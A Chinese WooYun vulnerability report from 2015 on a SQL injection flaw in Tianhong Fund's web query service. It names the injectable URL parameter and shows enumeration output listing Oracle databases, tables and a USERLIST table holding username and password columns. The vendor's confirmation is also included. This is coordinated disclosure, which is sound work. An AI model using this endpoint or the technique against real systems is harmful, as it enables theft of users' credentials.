漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0128090
漏洞标题:天弘基金SQL注入漏洞(涉及用户密码)
相关厂商:天弘基金管理有限公司
漏洞作者: M4sk
提交时间:2015-07-21 13:53
修复时间:2015-09-05 08:38
公开时间:2015-09-05 08:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商已经确认,细节仅向厂商公开
2015-08-01: 细节向核心白帽子及相关领域专家公开
2015-08-11: 细节向普通白帽子公开
2015-08-21: 细节向实习白帽子公开
2015-09-05: 细节向公众公开
简要描述:
RT
详细说明:
https://query.thfund.com.cn//thtopic.do?type=-1
available databases
[*] APEX_030200
[*] APPQOSSYS
[*] BRAS
[*] CCDB
[*] CTXSYS
[*] CUSTOMER
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] HSRISK0620
[*] HSXBRL
[*] HSXBRL_NEW
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEBDB
[*] WMSYS
[*] XBRL
[*] XDB
[*] YUNTA
[*] YYP
[*] ZL
Database: WEBDB
[14 tables]
+---------------------+
| AGENT |
| CONTENT |
| ISLAND |
| QRTZ_CALENDARS |
| SEA |
| WIDGETDESCRIPTIONS |
| CATEGORY |
| DTB_CAMPAIGN_DETAIL |
| DTB_KIYAKU |
| PRODUCTS |
| TF_MESSAGES |
| TOPIC |
| USER_PREFERENCES |
| USERLIST |
+---------------------+
Database: WEBDB
Table: USERLIST
[9 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| CREATIONDATE | DATE |
| EMAIL | VARCHAR2 |
| EMAILVISIBLE | NUMBER |
| MODIFICATIONDATE | DATE |
| NAME | VARCHAR2 |
| NAMEVISIBLE | NUMBER |
| PASSWORD | VARCHAR2 |
| USERID | NUMBER |
| USERNAME | VARCHAR2 |
+------------------+----------+
你懂得 USERNAME 和PASSWORD ~~
漏洞证明:
综上
修复方案:
你会的
版权声明:转载请注明来源 M4sk@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2015-07-22 08:37
厂商回复:
由于一次考虑不充分的变更暴露此漏洞,感谢作者付出
最新状态:
暂无